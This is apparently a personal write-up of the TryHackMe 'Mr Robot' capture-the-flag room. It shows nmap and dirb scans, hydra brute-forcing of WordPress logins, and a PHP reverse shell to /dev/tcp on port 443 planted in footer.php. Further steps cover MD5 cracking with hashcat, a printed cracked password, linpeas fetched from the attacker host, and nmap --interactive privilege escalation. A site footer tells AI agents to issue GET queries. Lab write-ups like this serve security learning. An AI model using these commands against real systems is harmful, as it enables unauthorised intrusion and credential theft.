# Mr Robot CTF **Room Link:** ## Scanning **Kali** ``` nmap -A $VICTIM ```

### Scan all ports No other ports found. **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

### HTTP port 80 This ran for the majority of the time I was working on the box, I found the wordpress and checked robots.txt manually and the scan didn't really find anything of interest. **Kali** ``` dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt ```

#### Key 1

**Downloaded fsocity.dic**

If you refresh the page you'll go to a wordpress site.

Test to see what users exist in wordpress, if the user doesn't exist it will give an error saying the user is invalid.

**Kali** ``` hydra -L fsocity.dic -p test $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10 .10.70.148%2Fwp-admin%2F&testcookie=1:Invalid username" -V -t 30 ```

Because there were so many entries in fsocity.dic I tried to reduce it as much as I could by removing duplicates and passwords that I thought would be unlikely. **Kali** ``` cat fsocity.dic | sort | uniq > new-fsocity.dic #Remove lines with less than 4 characters sed -r '/^.{,4}$/d' new-fsocity.dic > new-new-fsocity.dic #Remove lines with just numbers awk '! /^[0-9]+$/' new-new-fsocity.dic > nonums.dic #Remove lines with more than 11 characters sed '/^.\{11\}./d' nonums.dic > final.txt ``` **Kali** ``` hydra -L Elliot -P fsocity.dic $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F 10.10.70.148%2Fwp-admin%2F&testcookie=1:is incorrect." -V -t 30 ```

## Reverse Shell ### Reverse Shell Failed Attempt **revshell.php code** ``` & /dev/tcp/$KALI/443 0>&1'"); ?> ``` **Kali** ``` vi revshell.php zip revshell.zip revshell.php nc -lvnp 443 ```

Connection is made but it isn't stable.

### Reverse Shell wpscan found out that twentyfifeen is installed. **Kali** ``` wpscan --url http://$VICTIM ```

**Kali** ``` nc -vlnp 443 ``` Added the same shell to footer.php which should appear on every page visited. Then I just went back to http\://$VICTIM/join and it worked.

Get autocomplete **Victim** ``` python -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` **Victim** ``` cd /home/robot ls cat password.raw-md5 ```

**Kali** ``` hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt --show ```

**Victim** ``` su robot Password: abcdefghijklmnopqrstuvwxyz ```

### LinPeas **Kali** ``` wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh python2 -m SimpleHTTPServer 81 ``` **Victim** ``` cd /tmp/ wget http://$KALI:81/linpeas.sh chmod +x linpeas.sh ./linpeas.sh ```

## Privilege Escalation **Victim** ``` /usr/local/bin/nmap --interactive nmap> !sh ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/mr-robot-ctf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.